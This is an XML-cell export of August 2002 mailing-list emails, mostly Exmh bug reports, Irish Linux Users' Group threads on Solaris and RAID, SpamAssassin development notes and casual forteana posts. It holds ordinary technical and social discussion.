    <t>To: Chris Garrigues &lt;cwg-dated-1030460376.49ef5a@DeepEddy.Com&gt;\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Thu, 22 Aug 2002 18:55:03 +0200</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 18:55:03 +0200</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030460376.49ef5a@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>&gt; &gt; &gt; &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on \n&gt; &gt; &gt; &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this problem?\n&gt; &gt; &gt; \n&gt; &gt; &gt; I'll take the blame.\n&gt; &gt; &gt; \n&gt; &gt; &gt; The reason, I suspect, is that we're needlessly reading the .sequences file \n&gt; &gt; &gt; multiple times because of other sequences.  I need to make the code much \n&gt; &gt; &gt; smarter about handling that file, but first I have a few other fish to fry in \n&gt; &gt; &gt; my rather large patch that's on it's way.\n&gt; &gt; &gt; \n&gt; &gt; \n&gt; &gt; No panic,\n&gt; &gt; \n&gt; &gt; I'm all for cleaning things up before getting it optimized.\n&gt; \n&gt; Okay, this fix is now checked in.\n&gt; \nI'm afraid it didn't help. It still seems to be slower than ~1 month \nago. Maybe slightly faster than yeasterday. I'm (still) seeing an \n"unseen countdown" in the log.\n\n18:51:25 Writing /home/ander/Mail/lists/l-k/.mh_sequences\n18:51:25 lists/l-k has 57 msgs in unseen\n18:51:25 lists/l-k has 56 msgs in unseen\n18:51:25 lists/l-k has 55 msgs in unseen\n18:51:26 lists/l-k has 54 msgs in unseen\n18:51:26 lists/l-k has 53 msgs in unseen\n18:51:26 lists/l-k has 52 msgs in unseen\n18:51:26 lists/l-k has 51 msgs in unseen\n18:51:26 lists/l-k has 50 msgs in unseen\n18:51:26 lists/l-k has 49 msgs in unseen\n18:51:26 lists/l-k has 48 msgs in unseen\n18:51:26 lists/l-k has 47 msgs in unseen\n18:51:26 lists/l-k has 46 msgs in unseen\n18:51:26 lists/l-k has 45 msgs in unseen\n18:51:27 lists/l-k has 44 msgs in unseen\n18:51:27 lists/l-k has 43 msgs in unseen\n18:51:27 lists/l-k has 42 msgs in unseen\n18:51:27 lists/l-k has 41 msgs in unseen\n18:51:27 lists/l-k has 40 msgs in unseen\n18:51:27 lists/l-k has 39 msgs in unseen\n18:51:27 lists/l-k has 38 msgs in unseen\n18:51:27 lists/l-k has 37 msgs in unseen\n18:51:27 lists/l-k has 36 msgs in unseen\n18:51:28 lists/l-k has 35 msgs in unseen\n18:51:28 lists/l-k has 34 msgs in unseen\n18:51:28 lists/l-k has 33 msgs in unseen\n18:51:28 lists/l-k has 32 msgs in unseen\n18:51:28 lists/l-k has 31 msgs in unseen\n18:51:28 lists/l-k has 30 msgs in unseen\n18:51:28 lists/l-k has 29 msgs in unseen\n18:51:28 lists/l-k has 28 msgs in unseen\n18:51:28 lists/l-k has 27 msgs in unseen\n18:51:28 lists/l-k has 26 msgs in unseen\n18:51:29 lists/l-k has 25 msgs in unseen\n18:51:29 lists/l-k has 24 msgs in unseen\n18:51:29 lists/l-k has 23 msgs in unseen\n18:51:29 lists/l-k has 22 msgs in unseen\n18:51:29 lists/l-k has 21 msgs in unseen\n18:51:29 lists/l-k has 20 msgs in unseen\n18:51:29 lists/l-k has 19 msgs in unseen\n18:51:29 lists/l-k has 18 msgs in unseen\n18:51:29 lists/l-k has 17 msgs in unseen\n18:51:29 lists/l-k has 16 msgs in unseen\n18:51:30 lists/l-k has 15 msgs in unseen\n18:51:30 lists/l-k has 14 msgs in unseen\n18:51:30 lists/l-k has 13 msgs in unseen\n18:51:30 lists/l-k has 12 msgs in unseen\n18:51:30 lists/l-k has 11 msgs in unseen\n18:51:30 lists/l-k has 10 msgs in unseen\n18:51:30 lists/l-k has 9 msgs in unseen\n18:51:30 digits changed\n18:51:30 lists/l-k has 8 msgs in unseen\n18:51:30 lists/l-k has 7 msgs in unseen\n18:51:31 lists/l-k has 6 msgs in unseen\n18:51:31 lists/l-k has 5 msgs in unseen\n18:51:31 lists/l-k has 4 msgs in unseen\n18:51:31 lists/l-k has 3 msgs in unseen\n18:51:31 lists/l-k has 2 msgs in unseen\n18:51:31 lists/l-k has 1 msgs in unseen\n18:51:31 lists/l-k has 0 msgs in unseen\n18:51:31 FlistUnseenFolder lists/l-k\n18:51:31 ok\n18:51:47 Folder_Change lists/exmh {Msg_Show cur}\n\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Theo Van Dinter &lt;felicity@kluge.net&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 22 Aug 2002 18:30:45 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 18:30:45 +0100</t>
  </si>
  <si>
    <t>Re: [SAdev] 2.40 RELEASE PROCESS: mass-check status, folks?</t>
  </si>
  <si>
    <t>Theo Van Dinter said:\n\n&gt; &gt;         nonspam-theo.log\n&gt; \n&gt; Hmmm.  I did re-run mass-check and resubmit...  I sort the log by score,\n&gt; so the timestamp is at the end:\n\nah, OK.  didn't see that.\n\n--j.\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To: Chris Garrigues &lt;cwg-dated-1030377287.06fa6d@DeepEddy.Com&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Thu, 22 Aug 2002 18:26:25 +0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 18:26:25 +0700</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030377287.06fa6d@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Date:        Wed, 21 Aug 2002 10:54:46 -0500     From:        Chris Garrigues      Message-ID:  &lt;1029945287.4797.TMDA@deepeddy.vircio.com&gt;   | I can't reproduce this error. For me it is very repeatable... (like every time, without fail). This is the debug log of the pick happening ... 18:19:03 Pick_It {exec pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace} {4852-4852 -sequence mercury} 18:19:03 exec pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace 4852-4852 -sequence mercury 18:19:04 Ftoc_PickMsgs {{1 hit}} 18:19:04 Marking 1 hits 18:19:04 tkerror: syntax error in expression "int ... Note, if I run the pick command by hand ... delta$ pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace  4852-4852 -sequence mercury 1 hit That's where the "1 hit" comes from (obviously).  The version of nmh I'm using is ... delta$ pick -version pick -- nmh-1.0.4 [compiled on fuchsia.cs.mu.OZ.AU at Sun Mar 17 14:55:56 ICT 2002] And the relevant part of my .mh_profile ... delta$ mhparam pick -seq sel -list Since the pick command works, the sequence (actually, both of them, the one that's explicit on the command line, from the search popup, and the one that comes from .mh_profile) do get created. kre ps: this is still using the version of the code form a day ago, I haven't been able to reach the cvs repository today (local routing issue I think). _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Bill Stoddard &lt;bill@wstoddard.com&gt;\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Thu, 22 Aug 2002 18:25:48 -0300</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 18:25:48 -0300</t>
  </si>
  <si>
    <t>Bill Stoddard &lt;bill@wstoddard.com&gt;</t>
  </si>
  <si>
    <t>--------------080808010909060409040405 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Bill Stoddard wrote: &gt;&gt;No one likes commercial spam.  &gt;&gt;     &gt;&gt; &gt;And no one like unsolicited political spam. End of story. &gt; &gt;Bill  &gt;[URL]http://xent.com[/URL] &gt;   &gt; Except perhaps for the people in charge. Owen [URL]http://zdnet.com.com[/URL] *Political spam on your cell phone?* By Lisa M. Bowman  Special to ZDNet News August 22, 2002, 12:05 PM PT URL: [URL]http://zdnet.com.com[/URL]  &lt;%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20[URL]http://zdnet.com.com[/URL]&gt;  *In a decision that treats text messaging on mobile phones essentially  the same as bumper stickers, the Federal Election Commission has  declared that senders of text-based political ads don't have to disclose  who funded them.* In an advisory opinion issued Thursday, the FEC also suggested such  messages include either a phone number or Web site link, so people could  easily learn who paid for the message. However, the additional  information won't be required. The opinion could encourage the adoption of text-based political ads, as  campaign experts look for new technological ways to sway voters. At the  same time, opponents of the plan fear it could lead to anonymous  political spam. Target Wireless, a small New Jersey-based wireless media company, had  asked the FEC for an opinion on the matter, saying that requiring  financial disclosures on short messaging service (SMS) mailings would  use up too much of the 160 character-maximum. Political messages on bumper stickers and buttons are also exempt from  the financial disclosure requirement. Target Wireless' petition was  supported by the National Republican Senatorial Committee, the Cellular  Telecommunications and Internet Association, and some advertising trade  groups. FEC spokesman Bob Biersack said the opinion was in keeping with the  commission's policy not to meddle with new technology that has the  potential to reach more voters. "We have tried very hard not to get in the way--particularly before  everyone understands how the technology is going to work," he said. Opponents of the plan have worried the exemption might encourage spam or  allow senders to blast people with mass amounts of negative political  messages while remaining anonymous. Biersack said the FEC can revisit the issue if those problems surface. Target Wireless President Craig Krueger characterized the opinion as  "good for America." "It will allow people to receive more communication from those running  for office," he said. "We have free speech on our side." --------------080808010909060409040405-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://xent.com http://zdnet.com.com http://zdnet.com.com http://zdnet.com.com http://xent.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Thu, 22 Aug 2002 17:42:26 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 17:42:26 +0100</t>
  </si>
  <si>
    <t>John P. Looney wrote:\n&gt; On Thu, Aug 22, 2002 at 05:13:01PM +0100, Fergal Moran mentioned:\n&gt; \n&gt;&gt;In a nutshell - Solaris is Suns own flavour of UNIX.\n&gt; \n&gt; \n&gt;  Though I'm sure that this nice person would like a bit more detail.\n&gt; \n&gt;  Solaris is quite different to Linux, though these days you can make\n&gt; solaris act a lot like linux with an extra CD of GNU tools Sun ship with\n&gt; solaris. It is based on the SysV unix family, so it's quite similar to\n&gt; other unixen like HPUX and SCO.\n&gt; \n&gt;  Sun's hardware in general is more reliable, and a lot more expensive. One\n&gt; of the main bonuses you get by buying Sun is that you are getting your\n&gt; hardware and software from one company, so if you have a support contract,\n&gt; they have to fix it. They can't fob you off with 'that's a software\n&gt; problem, talk to the software vendor.' etc.\n&gt; \n&gt;  If you are set on Linux, you most likely can do your own support. There\n&gt; is then a world of different hardware options. You can run Linux on Sparc,\n&gt; though some companies like RedHat don't maintain a sparc port anymore.\n&gt; \n&gt;  You can also buy your machine from linux-oriented companies like DNUK,\n&gt; who do machines designed to run linux, and their own version of linux,\n&gt; that has a few extras for their machines. Or, you can get a machine from a\n&gt; cheaper company like Dell, and it'll most likely work, most of the time.\n\nWhy do you say Dell is cheaper than DNUK?\n\nIt gets a bit complicated though!\n[URL]http://www.levenez.com[/URL]\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.levenez.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ILUG &lt;ilug@linux.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Thu, 22 Aug 2002 17:36:41 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 17:36:41 +0100</t>
  </si>
  <si>
    <t>On Thu, Aug 22, 2002 at 05:13:01PM +0100, Fergal Moran mentioned:\n&gt; In a nutshell - Solaris is Suns own flavour of UNIX.\n\n Though I'm sure that this nice person would like a bit more detail.\n\n Solaris is quite different to Linux, though these days you can make\nsolaris act a lot like linux with an extra CD of GNU tools Sun ship with\nsolaris. It is based on the SysV unix family, so it's quite similar to\nother unixen like HPUX and SCO.\n\n Sun's hardware in general is more reliable, and a lot more expensive. One\nof the main bonuses you get by buying Sun is that you are getting your\nhardware and software from one company, so if you have a support contract,\nthey have to fix it. They can't fob you off with 'that's a software\nproblem, talk to the software vendor.' etc.\n\n If you are set on Linux, you most likely can do your own support. There\nis then a world of different hardware options. You can run Linux on Sparc,\nthough some companies like RedHat don't maintain a sparc port anymore.\n\n You can also buy your machine from linux-oriented companies like DNUK,\nwho do machines designed to run linux, and their own version of linux,\nthat has a few extras for their machines. Or, you can get a machine from a\ncheaper company like Dell, and it'll most likely work, most of the time.\n\nJohn\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Thu, 22 Aug 2002 17:23:28 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 17:23:28 +0100</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Which Muppet Are You?</t>
  </si>
  <si>
    <t>&gt; Apols if this has been posted before:\n&gt; \n&gt; [URL]http://www.pinkpaperclips.net[/URL]\n&gt;\nSo, anyone who isn't Beaker?\n\nTimC\nMeep\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.pinkpaperclips.net http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: "ILUG" &lt;ilug@linux.ie&gt;\nFrom: "Kiall Mac Innes" &lt;kiall@redpie.com&gt;\nDate: Thu, 22 Aug 2002 17:23:15 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 17:23:15 +0100</t>
  </si>
  <si>
    <t>[ILUG] Sun Solaris..</t>
  </si>
  <si>
    <t>Can someone explain what type of operating system Solaris is... as ive never\nseen or used it i dont know wheather to get a server from Sun or from DELL i\nwould prefer a linux based server and Sun seems to be the one for that but\nim not sure if Solaris is a distro of linux or a completely different\noperating system? can someone explain...\n\nKiall Mac Innes\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Kiall Mac Innes" &lt;kiall@redpie.com&gt;, "ILUG" &lt;ilug@linux.ie&gt;\nFrom: "Fergal Moran" &lt;fergal.moran@wasptech.com&gt;\nDate: Thu, 22 Aug 2002 17:13:01 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 17:13:01 +0100</t>
  </si>
  <si>
    <t>"Fergal Moran" &lt;fergal.moran@wasptech.com&gt;</t>
  </si>
  <si>
    <t>"Kiall Mac Innes" &lt;kiall@redpie.com&gt;, "ILUG" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG] Sun Solaris..</t>
  </si>
  <si>
    <t>In a nutshell - Solaris is Suns own flavour of UNIX.\n\n&gt; -----Original Message-----\n&gt; From: Kiall Mac Innes [mailto:kiall@redpie.com] \n&gt; Sent: 22 August 2002 17:23\n&gt; To: ILUG\n&gt; Subject: [ILUG] Sun Solaris..\n&gt; \n&gt; \n&gt; Can someone explain what type of operating system Solaris \n&gt; is... as ive never seen or used it i dont know wheather to \n&gt; get a server from Sun or from DELL i would prefer a linux \n&gt; based server and Sun seems to be the one for that but im not \n&gt; sure if Solaris is a distro of linux or a completely \n&gt; different operating system? can someone explain...\n&gt; \n&gt; Kiall Mac Innes\n&gt; \n&gt; \n&gt; -- \n&gt; Irish Linux Users' Group: ilug@linux.ie \n&gt; [URL]http://www.linux.ie[/URL] for \n&gt; (un)subscription information. List maintainer: listmaster@linux.ie\n&gt; \n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: iiu &lt;iiu@taint.org&gt;\nFrom: Bernard Michael Tyers &lt;bernard.tyers@dcu.ie&gt;\nDate: Thu, 22 Aug 2002 16:58:37 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:58:37 +0100</t>
  </si>
  <si>
    <t>iiu &lt;iiu@taint.org&gt;</t>
  </si>
  <si>
    <t>[IIU] Eircom aDSL Nat'ing</t>
  </si>
  <si>
    <t>Hi all,\n\napologies for the possible silly question (i don't think it is, but), \nbut is Eircom's aDSL service NAT'ed?\n\nand what implications would that have for VoIP? I know there are \ndifficulties with VoIP or connecting to clients connected to a NAT'ed \nnetwork from the internet wild (i.e. machines with static, real IPs)\n\nany help pointers would be helpful,\n\ncheers\n-- \nrgrds,\nBernard\n-- \nBernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *\nE: bernard.tyers@dcu.ie * W: [URL]www.physics.dcu.ie[/URL] * L:N117\n\n_______________________________________________\nIIU mailing list\nIIU@iiu.taint.org\n[URL]http://iiu.taint.org[/URL]</t>
  </si>
  <si>
    <t>To: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 16:54:11 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:54:11 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_592622610P Content-Type: text/plain; charset=us-ascii &gt; From:  Anders Eriksson  &gt; Date:  Thu, 22 Aug 2002 23:14:20 +0200 &gt; &gt;  &gt; &gt;&gt;&gt;&gt;&gt; On Thu, 22 Aug 2002, "Chris" == Chris Garrigues wrote: &gt;  &gt;   Chris&gt; --==_Exmh_267413022P Content-Type: text/plain; &gt;   Chris&gt; charset=us-ascii &gt;  &gt;   +&gt; From:  Anders Eriksson  Date:  Thu, 22 Aug &gt;   +&gt; 2002 20:23:17 +0200 &gt;  &gt;   +&gt; Oooops! &gt;  &gt;   +&gt; Doesn't work at all. Got this on startup and on any attempt to &gt;   +&gt; change folde r (which fail) &gt;  &gt;   Chris&gt; ~sigh~ I'd already found that and checked it in....apparently &gt;   Chris&gt; I did so after you checked it out and before you sent this &gt;   Chris&gt; mail...I hoped I was fast enough that you wouldn't see it. &gt;  &gt;   Chris&gt; Try again! &gt;  &gt;  &gt; Works like a charm. It's like the box was on drugs or something.  &gt;  &gt; However, while testing it a selected my favourite folder (l-k) and  &gt; marked ~400 messages unread. THAT took forever, or about as long as  &gt; Catch-up Unseen did before. Any suggestions? That's fixed now.  I thought I'd caught all the occurrences of that particular  coding stupidity. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_592622610P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZV2CK9b4h5R0IUIRAnWSAJwLZJvK8S4LQRv57W3WIbG9U2P+ywCdExEL kJaVNhuHKW9tp29wID5EjbU= =HDIb -----END PGP SIGNATURE----- --==_Exmh_592622610P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Thu, 22 Aug 2002 16:30:07 -0300</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:30:07 -0300</t>
  </si>
  <si>
    <t>Re: lifegem</t>
  </si>
  <si>
    <t>Joseph S. Barrera III wrote:\n\n&gt; Chris Haun wrote:\n&gt;\n&gt;&gt; A LifeGem is a certified, high quality diamond created from the \n&gt;&gt; carbon of your loved one as a memorial to their unique and wonderful \n&gt;&gt; life.\n&gt;\n&gt;\n&gt; Why wait until you're dead? I'm sure there's enough carbon in\n&gt; the fat from your typical liposuction job to make a decent diamond.\n&gt;\n&gt; - Joe\n&gt;\nOh, hell - what about excrement? I'd love to be able to say - No, the \nsun doesn't shine out of my ass, but there's the occasional diamond. ;-).\n\nOwen\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: linux-raid@vger.kernel.org\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Thu, 22 Aug 2002 16:25:45 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:25:45 +0100</t>
  </si>
  <si>
    <t>linux-raid@vger.kernel.org</t>
  </si>
  <si>
    <t>[ILUG] Re: Problems with RAID1 on cobalt raq3</t>
  </si>
  <si>
    <t>On Mon, Aug 19, 2002 at 03:08:16PM +0100, John P. Looney mentioned:\n&gt;  This is likely because to get it to boot, like the cobalt, I'm actually\n&gt; passing root=/dev/hda5 to the kernel, not /dev/md0. \n\n Just to solve this...the reason I was booting the box with\nroot=/dev/hda5, not /dev/md0 was because /dev/md0 wasn't booting - it\nwould barf with 'can't find init'.\n\n It turns out that this is because I was populating md0 with tar. Which\nseems to have 'issues' with crosslinked files - for instance, it was\ntrying to make a hard link of glibc.so to hda - and failing. It was only\nas I did it again with a friend present, that he spotted the errors, and\nqueried them. We noticed that the hard linked files just didn't exist on\nthe new rootfs.\n\n When we duplicated the filesystems with dump instead of tar, it worked\nfine, I was able to tell lilo to use root=/dev/md0 and everything worked.\n\n Woohoo.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-devel@example.sourceforge.net&gt;\nFrom: David H=?ISO-8859-1?B?9g==?=hn &lt;dh@uptime.at&gt;\nDate: Thu, 22 Aug 2002 16:19:48 +0200</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:19:48 +0200</t>
  </si>
  <si>
    <t>David H=?ISO-8859-1?B?9g==?=hn &lt;dh@uptime.at&gt;</t>
  </si>
  <si>
    <t>[SAdev] Interesting approach to Spam handling..</t>
  </si>
  <si>
    <t>Hello, have you seen and discussed this article and his approach?\n\nThank you\n\n[URL]http://www.paulgraham.com[/URL]\n-- "Hell, there are no rules here-- we're trying to accomplish something."\n-- Thomas Alva Edison\n\n\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http://www.paulgraham.com https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "uncle_slacky" &lt;robert.chambers@baesystems.com&gt;\nDate: Thu, 22 Aug 2002 16:17:39 -0000</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:17:39 -0000</t>
  </si>
  <si>
    <t>[zzzzteana] Which Muppet Are You?</t>
  </si>
  <si>
    <t>Apols if this has been posted before:\n\n[URL]http://www.pinkpaperclips.net[/URL]\n\nRob\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "uncle_slacky" &lt;robert.chambers@baesystems.com&gt;\nDate: Thu, 22 Aug 2002 16:11:27 -0000</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:11:27 -0000</t>
  </si>
  <si>
    <t>[zzzzteana] Re: Australian Catholic Kiddie Perv Steps Aside</t>
  </si>
  <si>
    <t>--- In forteana@y..., "D.McMann"  wrote: &gt; Robert Moaby, 33, who sent death threats to staff, was also jailed &gt; for hoarding indecent pictures of children on his home computer. &gt; ========= &gt;  &gt; Hmm, if I didn't trust our government and secret police, I could  look at &gt; this another way.... There is a bit of circumstantial evidence - apparently some MT  listers were approached by him (via email) - a little research in  dejanews/google groups showed a number of messages from him, clearly  hoping to contact girls, appearing in "alt.teens" and similar groups -  I just tried a Google Groups search on "Robert Moaby" and some of  them came top of the list. Note for Marie - "MT" stands for Mark Thomas, a slightly slimmer, UK  version of your Michael Moore - the mailing list is named after him.  Rob ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt; 4 DVDs Free +s&amp;p Join Now [URL]http://us.click.yahoo.com[/URL] ---------------------------------------------------------------------~-&gt; To unsubscribe from this group, send an email to: forteana-unsubscribe@egroups.com   Your use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Troy Engel &lt;tengel@fluid.com&gt;\nDate: Thu, 22 Aug 2002 16:10:38 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:10:38 -0700</t>
  </si>
  <si>
    <t>latest php upgrade in 7.3</t>
  </si>
  <si>
    <t>Today an apt-get upgrade holds back php (and submodules, like php-imap).    Running an apt-get install php to see what's up, I get: # apt-get install php Processing File Dependencies... Done Reading Package Lists... Done Building Dependency Tree... Done The following extra packages will be installed:    curl-devel imap imap-devel mysql mysql-devel php-imap php-ldap postgresql    postgresql-devel postgresql-libs pspell-devel ucd-snmp-devel  ucd-snmp-utils    unixODBC unixODBC-devel The following NEW packages will be installed:    curl-devel imap imap-devel mysql mysql-devel postgresql postgresql-devel    postgresql-libs pspell-devel ucd-snmp-devel ucd-snmp-utils unixODBC    unixODBC-devel The following packages will be upgraded    php php-imap php-ldap 3 packages upgraded, 13 newly installed, 0 to remove(replace) and 1 not  upgraded. Anyone have an idea what the heck RedHat did here, and why we're now  trying to install a ton of crap I don't want?  (I'm hoping someone else  has chased this down and could save me time... ;) ) thx, -te --  Troy Engel, Systems Engineer Cool as the other side of the pillow _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Chris Haun &lt;chris@noskillz.com&gt;\nDate: Thu, 22 Aug 2002 16:09:34 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:09:34 -0400 (EDT)</t>
  </si>
  <si>
    <t>public mailing list sign up package</t>
  </si>
  <si>
    <t>Has anyone seen/heard of/used some package that would let a random person \ngo to a webpage, create a mailing list, then administer that list.  Also \nof course let ppl sign up for the lists and manage their subscriptions. \nSimilar to the old listbot.org, but i'd like to have it running on my \nserver not someone elses :)\n\nChris\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Justin Mason" &lt;zzzz@spamassassin.taint.org&gt;\nFrom: hauns_froehlingsdorf@infinetivity.com\nDate: Thu, 22 Aug 2002 16:07:05 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:07:05 -0500</t>
  </si>
  <si>
    <t>hauns_froehlingsdorf@infinetivity.com</t>
  </si>
  <si>
    <t>"Justin Mason" &lt;zzzz@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Re: hauns_froehlingsdorf@infinetivity.com</t>
  </si>
  <si>
    <t>This is an automated response to a message you have sent to hauns_froehlingsdorf@infinetivity.com.\n\nI will be out of the office until Monday, August 26 2002.\n\nI will reply to your email when I return.\n\nHauns\n\n___________________________________\n\nHauns Froehlingsdorf\nNetwork/Systems Manager\ninfinetivity, inc.\n952-225.4200\n[URL]http://www.infinetivity.com[/URL]</t>
  </si>
  <si>
    <t>http://www.infinetivity.com</t>
  </si>
  <si>
    <t>To: =?ISO-8859-1?Q?David_H=F6hn?= &lt;dh@uptime.at&gt;\nFrom: Matt Sergeant &lt;msergeant@startechgroup.co.uk&gt;\nDate: Thu, 22 Aug 2002 15:32:48 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 15:32:48 +0100</t>
  </si>
  <si>
    <t>=?ISO-8859-1?Q?David_H=F6hn?= &lt;dh@uptime.at&gt;</t>
  </si>
  <si>
    <t>Re: [SAdev] Interesting approach to Spam handling..</t>
  </si>
  <si>
    <t>David Hhn wrote:\n&gt; Hello, have you seen and discussed this article and his approach?\n&gt; \n&gt; Thank you\n&gt; \n&gt; [URL]http://www.paulgraham.com[/URL]\n\nYes. See the perl module Mail::SpamTest::Bayesian on CPAN, and the \nthread on sa-talk.\n\nMatt.\n\n\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To: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 15:28:05 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 15:28:05 -0500</t>
  </si>
  <si>
